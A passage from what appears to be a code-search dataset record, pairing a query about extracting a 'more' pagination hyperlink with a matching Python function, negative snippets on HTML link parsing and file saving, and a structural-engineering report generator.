Load)\", \"detail1\")\n rstr += design_summary_row(1, \"Shear Force (kN)\", \"detail2\", text_two=str(shear_force))\n rstr += design_summary_row(0, \"Components \", \"detail1\", col_span=\"2\")\n rstr += design_summary_row(1, \"Column Section\", \"detail1\", text_two=str(column_sec), text_two_css=\"detail2\")\n rstr += design_summary_row(2, \"Material\", \"detail2\", text_two=\"Fe \" + str(column_fu))\n rstr += design_summary_row(2, \"Hole\", \"detail2\", text_two=str(bolt_hole_type))\n rstr += design_summary_row(1, \"Beam Section\", \"detail1\", text_two=str(beam_sec), text_two_css=\"detail2\")\n rstr += design_summary_row(2, \"Material\", \"detail2\", text_two=\"Fe \" + str(beam_fu))\n rstr += design_summary_row(2, \"Hole\", \"detail2\", text_two=str(bolt_hole_type))\n rstr += design_summary_row(1, \"Seated Angle Section\", \"detail1\", text_two=str(seated_angle_section),\n text_two_css=\"detail2\")\n rstr += design_summary_row(2, \"Material\", \"detail2\", text_two=\"Fe \" + str(angle_fu))\n rstr += design_summary_row(2, \"Hole\", \"detail2\", text_two=str(bolt_hole_type))\n rstr += design_summary_row(1, \"Top Angle Section\", \"detail1\", text_two=str(top_angle_section),\n text_two_css=\"detail2\")\n rstr += design_summary_row(2, \"Material\", \"detail2\", text_two=\"Fe \" + str(angle_fu))\n rstr += design_summary_row(2, \"Hole\", \"detail2\", text_two=bolt_hole_type)\n rstr += design_summary_row(1, \"Bolts\", \"detail1\", col_span=\"2\")\n rstr += design_summary_row(2, \"Type\", \"detail2\", text_two=bolt_type)\n rstr += design_summary_row(2, \"Grade\", \"detail2\", text_two=bolt_grade)\n rstr += design_summary_row(2, \"Diameter (mm)\", \"detail2\", text_two=bolt_diameter)\n rstr += design_summary_row(2, \"Bolts - Required\", \"detail2\", text_two=bolts_required)\n rstr += design_summary_row(2, \"Bolts - Provided\", \"detail2\", text_two=bolts_provided)\n rstr += design_summary_row(2, \"Rows\", \"detail2\", text_two=number_of_rows)\n rstr += design_summary_row(2, \"Columns\", \"detail2\", text_two=number_of_cols)\n rstr += design_summary_row(2, \"Gauge (mm)\", \"detail2\", text_two=gauge)\n rstr += design_summary_row(2, \"Pitch (mm)\", \"detail2\", text_two=pitch)\n rstr += design_summary_row(2, \"End Distance (mm)\", \"detail2\", text_two=end)\n rstr += design_summary_row(2, \"Edge Distance (mm)\", \"detail2\", text_two=edge)\n rstr += design_summary_row(0, \"Assembly\", \"detail1\", col_span=\"2\")\n rstr += design_summary_row(1, \"Column-Beam Clearance (mm)\", \"detail2\", text_two=detail_gap,\n text_two_css=\"detail2\")\n\n rstr += \" \" + nl() + t('/table')\n rstr += t('h1 style=\"page-break-before:always\"') # page break\n rstr += t('/h1')\n\n # -----------------------------------------------------------------------------------\n rstr += self.design_report_header()\n # -----------------------------------------------------------------------------------\n\n # --------------------------------- Design Preferences ------------------------------\n # Write your code here\n\n\n # -----------------------------------------------------------------------------------\n rstr += self.design_report_header()\n # -----------------------------------------------------------------------------------\n\n # ------------------------------------ DESIGN CHECKS ---------------------------------\n rstr += t('table width = 100% border-collapse= \"collapse\" border=\"1px solid black\" table-layout:fixed')\n rstr += t('tr')\n rstr += t('td style=\"width:200px;\"')\n rstr += t('td width=\"50%\"')\n rstr += t('td width=\"50%\"')\n rstr += t('td style=\"width:50px;\"')\n rstr += t('/tr')\n rstr += design_check_row(\"Design Check\", \"\", \"\", \"\", col_span=\"4\", text_one_css=\"detail\")\n\n rstr += design_check_row(\"Check\", \"Required\", \"Provided\", \"Remark\", text_one_css=\"header1\",\n text_two_css=\"header1\", text_three_css=\"header1\", text_four_css=\"header1\")\n\n # Bolt\n rstr += design_check_row(\"Bolt Checks\", \"\", \"\", \"\", col_span=\"4\", text_one_css=\"detail\")\n\n # Bolt shear capacity (kN)\n const = str(round(math.pi / 4 * 0.78, 4))\n if is_hsfg == False:\n req_field = \"<i>V</i><sub>dsb</sub> = bolt_fu*(pi*0.78/4)*bolt_diameter^2/(&#8730;3)/\" \\\n \"<i>gamma<sub>mb</sub></i><br> [cl. 10.3.3]\"\n prov_field = \"<i>V</i><sub>dsb</sub> = \" + bolt_fu + \"*(\" + const + \")*\" + bolt_diameter + \"^2/\" \\\n + \"(&#8730;3)/1.25/1000 <br> \" + space(2) + \"= \" + shear_capacity\n elif is_hsfg == True:\n if bolt_hole_type == \"Standard\":\n K_h = str(1.0)\n elif bolt_hole_type == \"Oversized\":\n K_h = str(0.85)\n req_field = \"HSFG bolt shear capacity:\"\n # req_field += \"<br> <i>V</i><sub>dsf</sub> = mu_f*n_e*K_h*A_nb*f_0/<i>gamma<sub>mb</sub></i>\"\n req_field += \"<br> [cl. 10.3.3]\"\n prov_field = \"<i>V</i><sub>dsf</sub> = (\"\n prov_field += str(\n slip_factor_mu_f) + \")*(1)*(\" + K_h + \")*(\" + const + \"*\" + bolt_diameter + \"^2)<br>\" + space(2) + \\\n \"*(0.70*\" + bolt_fu + \")\" + \"/1.25/1000 <br> \" + space(2) + \"= \" + shear_capacity\n rstr += design_check_row(\"Bolt shear capacity (kN)\", req_field, prov_field, \" \")\n\n # Bolt bearing capacity (kN)\n # req_field = \"<i>V<sub>dpb</sub></i> = 2.5*k<sub>b</sub>*bolt_diameter*critical_thickness\" \\\n # +\"<br> *<i>f</i><sub>u</sub>/<i>gamma<sub>mb</sub></i><br> [Cl. 10.3.4]\"\n req_field = \"<i>V<sub>dpb</sub></i>:<br> [Cl. 10.3.4]\"\n if is_hsfg == False:\n prov_field = \"<i>V</i><sub>dpb</sub> = 2.5*\" + kb + \"*\" + bolt_diameter + \"*\" + beam_w_t + \"*\" \\\n + beam_fu + \"/1.25/1000) <br>\" + space(2) + \" = \" + bearing_capacity + \" kN\"\n elif is_hsfg == True:\n prov_field = 'N/A'\n rstr += design_check_row(\"Bolt bearing capacity (kN)\", req_field, prov_field, \"\")\n\n # Bolt capacity (kN)\n req_field = \"min (bolt_shear_capacity, bolt_bearing_capacity)\"\n prov_field = \"min (\" + str(self.bolt_shear_capacity) + \", \" + str(self.bolt_bearing_capacity) + \") = \" \\\n + str(self.bolt_value)\n rstr += design_check_row(\"Bolt capacity (kN)\", req_field, prov_field, \"\")\n\n # No. of bolts\n # bolts = str(round(float(shear_force) / float(str(self.bolt_value)), 1))\n bolts_req_based_on_force = (math.ceil(float(shear_force) / self.bolt_value))\n if bolts_req_based_on_force > self.bolts_provided:\n remark = check_fail\n else:\n remark = check_pass\n # req_field = \"shear_force/ bolt_value = \" + str(shear_force) + \"/\" + str(self.bolt_value) + \" = \" \\\n req_field = str(shear_force) + \"/\" + str(self.bolt_value) + \" = \" \\\n + str(bolts_req_based_on_force)\n rstr += design_check_row(\"No. of bolts\", req_field, bolts_provided, remark)\n\n rstr += design_check_row(\"No. of columns\", \" \", number_of_cols, \" \")\n rstr += design_check_row(\"No. of row(s)\", \" &#8804; 2\", number_of_rows, \" \")\n\n # Bolt pitch (mm)\n if self.pitch >= self.min_pitch and self.pitch <= self.max_spacing:\n remark = check_pass\n # req_field = \" &#8805; 2.5*bolt_diameter ,<br> &#8804; min(32*thickness_governing_min, 300) \"\n req_field = \"<br> &#8805; 2.5* \" + bolt_diameter + \" = \" + str(self.min_pitch) + \",<br> &#8804; min(32*\" + \\\n str(self.thickness_governing_min) + \", 300) = \" + str(self.max_spacing) + \"<br> [cl. 10.2.2] <br>\"\n prov_field = pitch\n elif self.pitch < self.min_pitch or self.pitch > self.max_spacing:\n if self.num_rows == 1:\n remark = \" \"\n req_field = \"N/A\"\n prov_field = \"N/A\"\n else:\n remark = check_fail\n # req_field = \" &#8805; 2.5*bolt_diameter ,<br> &#8804; min(32*thickness_governing_min, 300)\"\n req_field = \"<br> &#8805; 2.5* \" + bolt_diameter + \" = \" + str(\n self.min_pitch) + \",<br> &#8804; min(32*\" + \\\n str(self.thickness_governing_min) + \", 300) = \" + str(self.max_spacing) + \"<br> [cl. 10.2.2] <br>\"\n prov_field = pitch\n rstr += design_check_row(\"Bolt pitch (mm)\", req_field, prov_field, remark)\n\n # Bolt gauge (mm)\n if self.gauge >= self.min_gauge and self.gauge <= self.max_spacing:\n remark = check_pass\n elif self.gauge < self.min_gauge or self.gauge > self.max_spacing:\n remark = check_fail\n # req_field = \" &#8805; 2.5*bolt_diameter ,<br> &#8804; min(32*thickness_governing_min, 300)\"\n req_field = \"<br> &#8805; 2.5*\" + bolt_diameter + \" = \" + str(self.min_gauge) + \",<br> &#8804; min(32*\" + \\\n str(self.thickness_governing_min) + \", 300) = \" + str(self.max_spacing) + \"<br> [cl. 10.2.2] <br>\"\n rstr += design_check_row(\"Bolt gauge (mm)\", req_field, gauge, remark)\n\n # End distance (mm)\n if self.end_dist >= self.min_end_dist:\n remark = check_pass\n elif self.end_dist < self.min_end_dist:\n remark = check_fail\n # req_field = \" &#8805;\" + str(self.min_edge_multiplier) + \"*bolt_hole_diameter\" + \" [cl. 10.2.4.2]\"\n req_field = \"<br> &#8805;\" + str(self.min_edge_multiplier) + \"*\" + dia_hole + \" = \" + str(self.min_end_dist)\n rstr += design_check_row(\"End distance (mm)\", req_field, end, remark)\n\n # Edge distance (mm)\n if self.edge_dist >= self.min_edge_dist and self.edge_dist <= self.max_edge_dist:\n remark = check_pass\n elif self.edge_dist < self.min_edge_dist or self.edge_dist > self.max_edge_dist:\n remark = check_fail\n # req_field = \" &#8805;\" + str(self.min_edge_multiplier) + \"*bolt_hole_diameter,\"\n req_field = \" &#8805;\" + str(self.min_edge_multiplier) + \"*\" + dia_hole + \" = \" + str(self.min_edge_dist) + \" [cl. 10.2.4.2]<br>\"\n # Cl 10.2.4.3 if members are exposed to corrosive influences\n if is_environ_corrosive == \"Yes\":\n req_field += \"<br><br> As the members are exposed to corrosive influences: \"\n # req_field += \"<br> &#8804; min(12*thickness_governing_min*sqrt(250/f_y),<br>\" + space(\n # 2) + \" 40+4*thickness_governing_min)\"\n req_field += \"<br> [Cl 10.2.4.3]\"\n req_field += \"<br> &#8804; min(12*\" + str(self.thickness_governing_min) + \"*sqrt(250/\" \\\n + str(self.angle_fy) + \"), 40 + 4*\" + str(self.thickness_governing_min)\\\n + \") = \" + str(self.max_edge_dist)\n elif is_environ_corrosive == \"No\":\n # req_field += \"<br><br> &#8804; 12*thickness_governing_min*sqrt(250/f_y)\"\n req_field += \"<br> &#8804; 12*\" + str(self.thickness_governing_min) + \"sqrt(250/\" \\\n + str(self.angle_fy) + \") = \" + str(self.max_edge_dist) + \"[Cl 10.2.4.3]\"\n rstr += design_check_row(\"Edge distance (mm)\", req_field, edge, remark)\n\n # Seated angle\n rstr += design_check_row(\"Seated Angle \" + str(self.angle_sec), \"\", \"\", \"\", col_span=\"4\",\n text_one_css=\"detail\")\n\n # Seated angle length\n if connectivity == \"Column flange-Beam flange\":\n # req_field = \"= min(supported_beam_width,<br>\"+space(2)+\"supporting_column_width)\"\n req_field = \" <br> = min(\" + str(self.beam_w_f) + \", \" + str(self.column_w_f) + \")\"\n prov_field = str(self.angle_l)\n elif connectivity == \"Column web-Beam flange\":\n # limiting_angle_length = self.column_d - 2 * self.column_f_t - 2 * self.column_R1 - self.root_clearance_col\n # self.angle_l = int(math.ceil(min(self.beam_w_f, limiting_angle_length)))\n # req_field = \"= min(width of supported beam, <br>\" + space(2) + \\\n # \"column_depth - 2*column_flange_thickness<br>\" + space(2) +\\\n # \" - 2*column_R1 - root_clearance_col)\"\n req_field = \"<br> = min(\" + str(self.beam_w_f) \\\n + \", \" + str(self.column_d) + \" - 2*\" + str(self.column_f_t) \\\n + \" - 2*\" + str(self.column_R1) + \" - \" + str(self.root_clearance_col) + \")\"\n prov_field = str(self.angle_l)\n # As the seated angle length is a determined/calculated parameter, there is no design 'check' remark\n rstr += design_check_row(\"Length (mm)\", req_field, prov_field, \" \")\n\n # Length of outstanding leg\n if self.outstanding_leg_length_required < self.angle_B:\n remark = check_pass\n elif self.outstanding_leg_length_required > self.angle_B:\n remark = check_fail\n # req_field = \"b = (R*\" + sub(\"gamma\", \"m0\") + \"/(\" + sub(\"f\", \"yw\") +\\\n # \"*beam_web_thickness))<br>\" + space(2) + \"+ beam_column_clear_gap\"\n req_field = \"<br>[Cl. 8.7.4]\"\n req_field += \"<br> = (\" + str(self.shear_force) + \"*1000*\" + str(self.gamma_m0) + \"/(\" + str(self.beam_fy) \\\n + \"*\" + str(self.beam_w_t) + \")) + \" + str(self.detail_gap)\n prov_field = str(self.angle_B)\n rstr += design_check_row(\"Outstanding leg length (mm)\", req_field, prov_field, remark)\n\n # For angle thickness\n # Shear capacity of outstanding leg\n if self.outstanding_leg_shear_capacity > self.shear_force:\n remark = check_pass\n elif self.outstanding_leg_shear_capacity < self.shear_force:\n remark = check_fail\n req_field = sub(\"V\", \"dp\") + \" &#8805 V <br>\"\n req_field += sub(\"V\", \"dp\") + \" &#8805 \" + str(self.shear_force) + \"kN <br> [Cl. 8.4.1]\"\n # prov_field = sub(\"V\", \"dp\") + \"=\" + sub(\"A\", \"v\") + sub(\"f\", \"yw\") + \"/ (&#8730 3 *\" + sub(\"gamma\", \"m0\") + \")\"\n prov_field = \"<br>\" + space(1) + \"= (\" + str(self.angle_l) + \"*\" + str(self.angle_t)\\\n + \")*\" + str(self.angle_fy) + \"/ (&#8730 3 *\" + str(self.gamma_m0)\\\n + \")<br>\" + space(1) + \"= \" + str(self.outstanding_leg_shear_capacity)\n rstr += design_check_row(\"Shear capacity of outstanding leg (kN)\", req_field, prov_field,\n remark)\n\n # Moment capacity of outstanding leg\n if self.is_shear_high == False:\n req_field = \"As V &#8804 0.6 \" + sub(\"V\", \"d\")\n req_field += \",<br>[Cl 8.2.1.2] is applicable <br>\"\n req_field += sub(\"M\", \"d\") + \" &#8805 Moment at root of angle\"\n req_field += \"<br>\" + sub(\"M\", \"d\") + \" &#8805 \" + str(self.moment_at_root_angle)\n prov_field = sub(\"M\", \"d\") + \" = min(\" + sub(\"beta\", \"b\") + sub(\"Z\", \"e\") + sub(\"f\", \"y\")\n prov_field += \"/\" + sub(\"gamma\", \"m0\") + \", <br>\" + space(1) +\\\n \" 1.5\" + sub(\"Z\", \"e\") + sub(\"f\",\"y\") + \"/\" + sub(\"gamma\", \"m0\") + \")\"\n prov_field += \"<br>\" + space(1) + \" = min(1.0* \" + str(self.angle_l) + \"*(\" + str(self.angle_t) + \"^2/6)*\"\n prov_field += str(self.angle_fy) + \"/\" + str(self.gamma_m0) + \",<br>\" + space(2) \\\n + \" 1.5*\" + str(self.angle_l) + \"*(\" + str(self.angle_t) + \"^2/6)*\"\n prov_field += str(self.angle_fy) + \"/\" + str(self.gamma_m0) + \")\"\n prov_field += \"<br>\" + space(1) + \"= \" + str(self.moment_capacity_angle)\n\n elif self.is_shear_high == True:\n req_field = \"As V &#8805 0.6 \" + sub(\"V\", \"d\")\n req_field += \",<br>[Cl 8.2.1.3] is applicable\"\n req_field += \"<br>\" + sub(\"M\", \"dv\") + \" &#8805 Moment at root of angle\"\n req_field += \"<br>\" + sub(\"M\", \"dv\") + \" &#8805 \" + str(self.moment_at_root_angle) + \"<br>\"\n prov_field = sub(\"M\", \"dv\") + \"= min((1 - beta)\" + sub(\"M\", \"d\") + \" , \"\n prov_field += \"1.2 \" + sub(\"Z\", \"e\") + sub(\"f\", \"y\") + \"/\" + sub(\"gamma\", \"m0\") + \") <br>\"\n prov_field += space(1) + \"where, <br>\" + space(2) + \"beta = ((2V/\" + sub(\"V\", \"d\")\\\n + \")-1)^2 = \" + str(round(self.moment_high_shear_beta, 4)) + \"<br>\"\n prov_field += \"<br>\" + sub(\"M\", \"dv\") + \" = \" + \"min((1 - \" + str(round(self.moment_high_shear_beta, 4))\\\n + \")<br>\" + space(1) + \"*1.0*(\" + str(self.angle_l) + \"*\" + str(self.angle_t) + \"^2/6)*\"\n prov_field += str(self.angle_fy) + \"/\" + str(self.gamma_m0) + \" , \"\n prov_field += \"<br>\" + space(1) + \"1.2*(\" + str(self.angle_l) + \"*\" + str(self.angle_t) + \"^2/6)*\"\n prov_field += str(self.angle_fy) + \"/\" + str(self.gamma_m0) + \")\"\n prov_field += \"<br>\" + space(1) + \" = \" + str(self.moment_capacity_angle)\n\n if self.moment_capacity_angle > self.moment_at_root_angle:\n remark = check_pass\n elif self.moment_capacity_angle < self.moment_at_root_angle:\n remark = check_fail\n rstr += design_check_row(\"Moment capacity of outstanding leg (kN-mm)\", req_field,\n prov_field, remark)\n\n # Top angle\n rstr += design_check_row(\"Top Angle\", \"\", \"\", \"\", col_span=\"4\", text_one_css=\"detail\")\n req_field = \"Recommended size (based on stability only): \" + str(self.top_angle_recommended)\n prov_field = \"User selected size: \" + str(self.top_angle)\n rstr += design_check_row(\"Section \", req_field, prov_field, \" \")\n\n # End distance (mm)\n if self.top_angle_end_dist_beam <= self.min_end_dist or \\\n self.top_angle_end_dist_column <= self.min_end_dist:\n remark = check_fail\n else:\n remark = check_pass\n req_field = \" &#8805;\" + str(self.min_edge_multiplier) + \"*bolt_hole_diameter\" + \" [cl. 10.2.4.2]\"\n req_field += \"<br> &#8805;\" + str(self.min_edge_multiplier) + \"*\" + dia_hole + \" = \" + str(self.min_end_dist)\n prov_field = \" on leg connected to Beam: \" + str(self.top_angle_end_dist_beam)\n prov_field += \"<br> on leg connected to Column: \" + str(self.top_angle_end_dist_column)\n rstr += design_check_row(\"End distance (mm)\", req_field, prov_field, remark)\n\n\n rstr += t('/table')\n rstr += t('h1 style=\"page-break-before:always\"')\n rstr += t('/h1')\n\n # -----------------------------------------------------------------------------------\n rstr += self.design_report_header()\n # -----------------------------------------------------------------------------------\n\n # Connection images (views)\n rstr += t('table width = 100% border-collapse= \"collapse\" border=\"1px solid black\"')\n\n # row = [0, \"Views\", \" \"]\n # rstr += t('tr')\n # rstr += t('td colspan=\"2\" class=\" detail\"') + space(row[0]) + row[1] + t('/td')\n # rstr += t('/tr')\n rstr += design_summary_row(0, \"Views\", \"detail\", col_span=\"2\")\n\n if self.safe is True:\n png = folder + \"/images_html/3D_Model.png\"\n datapng = '<object type=\"image/PNG\" data= %s width =\"450\"></object\">' % png\n\n side = folder + \"/images_html/seatSide.png\"\n dataside = '<object type=\"image/PNG\" data= %s width =\"400\"></object>' % side\n\n top = folder + \"/images_html/seatTop.png\"\n datatop = '<object type=\"image/PNG\" data= %s width =\"400\"></object>' % top\n\n front = folder + \"/images_html/seatFront.png\"\n datafront = '<object type=\"image/PNG\" data= %s width =\"450\"></object>' % front\n\n row = [0, datapng, datatop]\n rstr += t('tr') + nl()\n rstr += html_space(4) + t('td align=\"center\" class=\" header2\"') + space(row[0]) + row[1] + t('/td') + nl()\n rstr += html_space(4) + t('td align=\"center\" class=\" header2\"') + row[2] + t('/td') + nl()\n rstr += t('/tr' + nl())\n\n row = [0, dataside, datafront]\n rstr += t('tr') + nl()\n rstr += html_space(4) + t('td align=\"center\" class=\" header2\"') + space(row[0]) + row[1] + t('/td') + nl()\n rstr += html_space(4) + t('td align=\"center\" class=\" header2 \"') + row[2] + t('/td') + nl()\n rstr += t('/tr') + nl()\n\n else:\n pass\n\n rstr += t('/table') + nl() + \" \" + nl()\n rstr += t('h1 style=\"page-break-before:always\"')\n rstr += t('/h1')\n\n # -----------------------------------------------------------------------------------\n rstr += self.design_report_header()\n # -----------------------------------------------------------------------------------\n\n rstr += t('hr')\n rstr += t('/hr') + nl() + \" \" + nl()\n\n rstr += t('table width = 100% border-collapse= \"collapse\" border=\"1px solid black\"') + nl()\n rstr += html_space(1) + t('''col width=30%''')\n rstr += html_space(1) + t('''col width=70%''') + nl()\n\n rstr += html_space(1) + t('tr') + nl()\n row = [0, \"Additional Comments\", additional_comments]\n rstr += html_space(2) + t('td class= \"detail1\"') + space(row[0]) + row[1] + t('/td') + nl()\n rstr += html_space(2) + t('td class= \"detail2\" align=\"justified\"') + row[2] + t('/td') + nl()\n rstr += html_space(1) + t('/tr') + nl()\n\n rstr += t('/table') + nl()\n\n myfile.write(rstr)\n myfile.write(t('/body'))\n myfile.write(t('/html'))\n myfile.close()", "def save(self, path):\n f = open(path, 'w')\n f.write(self.content().encode('utf-8'))\n f.close()", "def save(self, path):\n (folder, filename) = os.path.split(path)\n (name, extension) = os.path.splitext(filename)\n\n if not name:\n raise ValueError, \"name is required\"\n\n path = os.path.join(folder, name + self.extension)\n f = open(path, \"wb\")\n f.write(self.contents)\n f.close()\n\n return path", "def write_output(directory, name, html):\n if not os.path.isdir(directory):\n os.mkdir(directory)\n with open(os.path.join(directory, '.'.join((name, 'html'))), 'w') as f:\n f.write(beautify(html))", "def write_html_file(out_table, outpath):\r\n page_out = PAGE_HTML % (outpath, out_table)\r\n out = open(outpath, \"w+\")\r\n out.write(page_out)\r\n out.close()", "def save_file(self, file_name, text):\n\n with open(file_name, 'w') as content_file:\n content = content_file.write(text)", "def write_html(self, filename):\n # todo: allow writing in split mode\n html = self.to_html()\n open(filename, 'wt').write(html)\n print('Exported app to %r' % filename)", "def save_file(self, filename):\r\n \r\n f = open(filename,'w')\r\n f.write(self.body)\r\n f.close" ]
[ "0.787979", "0.7703456", "0.769332", "0.76318324", "0.7469195", "0.7466598", "0.73435193", "0.7313832", "0.7297087", "0.72894686", "0.726079", "0.7140499", "0.6979866", "0.69742167", "0.6938493", "0.6927359", "0.6867596", "0.67674464", "0.6729367", "0.66805", "0.658196", "0.6538259", "0.6533741", "0.64887965", "0.6449", "0.64456385", "0.6409755", "0.64096415", "0.6373767", "0.6372479" ]
0.8745617
0
Extracts hyperlink from more anchor tag
def getPaginationHyperlink(html: str) -> str: moreLinkPattern = r'\<tr class="morespace".*?\<a\shref="(?P<hyperlink>.+?)"\sclass="morelink"' morelinkCompiledRegex = re.compile(moreLinkPattern, flags=re.IGNORECASE | re.DOTALL) matchedRegex = morelinkCompiledRegex.search(html) if matchedRegex: hyperlink = matchedRegex.group("hyperlink") return getCompleteUrl(hyperlink) else: return str()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extract_next_page(parser):\n more = parser.find('a', class_='morelink')\n return more['href']", "def extract_next_page(parser):\n link = parser.find(\"a\", class_=\"morelink\")[\"href\"]\n return str(link)", "def _parse_links(self, response):\n links = []\n link_els = response.xpath(\n \"//div[contains(@class, 'right-col-block')]/h2[text() = 'Learn More']\"\n \"/following-sibling::*//a\"\n )\n for link_el in link_els:\n links.append(\n {\n \"href\": response.urljoin(link_el.attrib[\"href\"]),\n \"title\": link_el.xpath(\"./text()\").extract_first(),\n }\n )\n return links", "def extract_href_from_anchor(anchor):\n return find_text_between('href=\"','\">',anchor)", "def link_extract(link_text, content):\n h = html5lib.parse(content, namespaceHTMLElements=False)\n candidates = h.findall(\".//a[.='%s']\" % link_text)\n if not candidates:\n return 'NOT MATCHED'\n try:\n return candidates[0].attrib['href']\n except:\n return 'NOT MATCHED'", "def get_next_target(html):\n start_link = html.find('<a href=')\n if start_link == -1:\n return None, 0\n start_quote = html.find('\"', start_link)\n end_quote = html.find('\"', start_quote + 1)\n url = html[start_quote+1:end_quote]\n return url, end_quote", "def find_link(html_content):\n soup = BeautifulSoup(html_content, \"html.parser\")\n paragraphs = soup.find_all('p')\n for p in paragraphs:\n string = ''\n for element in p:\n if type(element) == bs4.element.NavigableString:\n string += element\n elif type(element) == bs4.element.Tag and element.name == 'a':\n if balanced_parenths(string):\n return element\n else:\n string += element.get_text()\n return None", "def parse_link(self,data,api):\n return REACT_API_DOCS_URL + data.FILE.split('/')[1] + api.find('a',attrs = {'class': 'hash-link'}).attrs['href']", "def get_next_target(page):\n\tstart_link = page.find('<a href=')\n\tif start_link == -1:\n\t\treturn None,0\n\turl_start = page.find('\"',start_link)\n\turl_end = page.find('\"',url_start+1)\n\turl= page[url_start+1:url_end]\n\treturn url, url_end", "def extract_url_from_anchor_tag(text):\n pattern = re.compile(r'(?<=href=\").*?(?=\")')\n matches = pattern.findall(text)\n return matches[0] if matches else ''", "def filter_url_parse_full_links(match):\n url = html.unescape(match.group(1))\n url = html.escape(url)\n punctuation = match.group(2)\n caption = filter_url_trim(url, filter_url_length)\n return '<a href=\"' + url + '\">' + caption + '</a>' + punctuation", "def parse_links(html):\n\n soup = BeautifulSoup(html, 'lxml')\n content_cards = soup.find_all('a', {'class': 'content-card-link'})\n review_links = [cc.get('href') for cc in content_cards]\n review_links = [review_link.split('/')[-1] for review_link in review_links]\n return review_links", "def _parse_links(self, response):\n links = []\n for link in response.css(\".row.mt-4 .list-unstyled a\"):\n links.append(\n {\n \"title\": \" \".join(link.css(\"*::text\").extract()).strip(),\n \"href\": response.urljoin(link.attrib[\"href\"]),\n }\n )\n return links", "def extract_link(self, page_url, element, attribute_name):\n attribute = element.attrs.get(attribute_name, None)\n if attribute is None:\n return None\n\n return urljoin(page_url, attribute, allow_fragments=False)", "def links_to_text(self):\r\n self.parser.stripTags(self.get_top_node(), 'a')", "def find_link_title(link_para):\n urls = []\n source_code = requests.get(link_para)\n plain_text = source_code.text\n parsed_html = BeautifulSoup(plain_text)\n for sub_link in parsed_html.find_all('a'):\n urls.append(sub_link.string)\n print urls", "def extract_url(td):\n url = td.find('a',href=True)['href']\n return url", "def show_more ( url, url_extern, info='Mehr ...' ) :\n return show_link ( url, info, url_extern )", "def _parse_links(self, item):\n regex = compile(r\"<a\\s+(?:[^>]*?\\s+)?href=([\\\"\\'])(.*?)\\1.*\\>(.*)<\\/a>\")\n links = [\n {\"href\": href, \"title\": title}\n for (_, href, title) in findall(regex, item[\"Event\"][\"Description\"])\n ]\n for link in links:\n if link[\"href\"][0] == \"/\":\n link[\"href\"] = \"https://www.pghschools.org\" + link[\"href\"]\n return links", "def extract_links(data):\n soup = BeautifulSoup(data)\n for link in soup.findAll(\"a\"):\n for pair in link.attrs:\n if pair[0] == u'href':\n yield pair[1]", "def filter_url_parse_partial_links(match):\n dname = html.unescape(match.group(1))\n dname = html.escape(dname)\n punctuation = match.group(2)\n caption = filter_url_trim(dname, filter_url_length)\n return '<a href=\"http://' + dname + '\">' + caption + '</a>' + punctuation", "def html_anchor_tags(self):\n return self.findall_markdown_cells(r'<a [^>]*>')", "def puxa_link(soup):\n link = []\n for item in soup.select('.listing-item__title'):\n link.append(item.a.get('href'))\n return link", "def extract_text(td):\n text = td.find('a',href=True).text\n return text", "def ref_to_link(txt):\n text = txt.group(1) # because it was a match in a regular expression\n\n thecite, everythingelse = first_bracketed_string(text)\n thecite = thecite[1:-1] # strip curly brackets\n thecite = thecite.replace(\"\\\\\",\"\") # \\href --> href\n\n refs = thecite.split(\",\")\n ans = \"\"\n\n # print \"refs\",refs\n\n for ref in refs:\n ref = ref.strip() # because \\cite{A, B, C,D} can have spaces\n this_link = \"\"\n if ref.startswith(\"href\"):\n the_link = re.sub(r\".*{([^}]+)}{.*\", r\"\\1\", ref)\n click_on = re.sub(r\".*}{([^}]+)}\\s*\", r\"\\1\", ref)\n this_link = '{{ LINK_EXT(\"' + click_on + '\",\"' + the_link + '\") | safe}}'\n elif ref.startswith(\"doi\"):\n ref = ref.replace(\":\",\"\") # could be doi:: or doi: or doi\n the_doi = ref[3:] # remove the \"doi\"\n this_link = '{{ LINK_EXT(\"' + the_doi + '\",\"https://doi.org/' + the_doi + '\")| safe }}'\n elif ref.lower().startswith(\"mr\"):\n ref = ref.replace(\":\",\"\")\n the_mr = ref[2:] # remove the \"MR\"\n this_link = '{{ LINK_EXT(\"' + 'MR:' + the_mr + '\", '\n this_link += '\"http://www.ams.org/mathscinet/search/publdoc.html?pg1=MR&s1='\n this_link += the_mr + '\") | safe}}'\n elif ref.lower().startswith(\"arxiv\"):\n ref = ref.replace(\":\",\"\")\n the_arx = ref[5:] # remove the \"arXiv\"\n this_link = '{{ LINK_EXT(\"' + 'arXiv:' + the_arx + '\", '\n this_link += '\"http://arxiv.org/abs/'\n this_link += the_arx + '\")| safe}}'\n\n\n if this_link:\n if ans:\n ans += \", \"\n ans += this_link\n\n return '[' + ans + ']' + everythingelse", "def grab_links(self):\n links = []\n link_char = []\n w_temp = [] #in template?\n par = [] #in parentheses?\n rtag = [] #in <ref> tag?\n dtag = [] #in <div> tag?\n\n skip_char = []\n\n for i, c in enumerate(self.article_xml):\n if i in skip_char: continue #eliminates double counting\n char = self.article_xml[i:i+2]\n tag = self.article_xml[i:i+4]\n \n #wiki template\n w_temp = self.inside_char(char, Article.w_marker, w_temp, i)\n if char in Article.w_marker: skip_char.append(i+1)\n if w_temp:\n continue #doesn't process if inside wiki template\n \n #parentheses\n par = self.inside_char(c, Article.par_marker, par, i)\n if par:\n continue\n \n #<ref> or <div>\n rtag = self.inside_char(tag, Article.rtag_marker, rtag, i)\n dtag = self.inside_char(tag, Article.dtag_marker, dtag, i)\n if rtag or dtag:\n continue\n \n #clear to add outer-most link\n if char == '[[':\n link_char.append(i)\n elif char == ']]' and len(link_char) == 1:\n links.append( self.article_xml[link_char[0]:i+2])\n link_char.pop()\n elif char == ']]' and len(link_char) > 1:\n link_char.pop()\n return links", "def getLinks(link):\n source = requests.get(link).text\n soup = BeautifulSoup(source, 'lxml')\n rows = soup.find_all(class_ = 'column-1') #select which column \n list_of_links = []\n \n for row in rows[1:]: #rows[1:] is used in case first row is a title row (ie there is no useful data here)\n name = row.find('a')\n link = name.attrs['href'] #the data I'm trying to extract\n list_of_links.append(link)\n return list_of_links", "def extractUrl(self, href):\n url = ''\n pattern = re.compile(r'(http[s]?://[^&]+)&', re.U | re.M)\n url_match = pattern.search(href)\n if(url_match and url_match.lastindex > 0):\n url = url_match.group(1)\n\n return url", "def parse_anchor(anchor):\n \n href = anchor.get(\"href\")\n content = anchor.text\n \n if href == None:\n href = ''\n \n if content == None:\n content == ''\n \n return href, content", "def DealUrlFirst(self, match, all_link):\n counter = 0\n for each_link in all_link:\n model_link 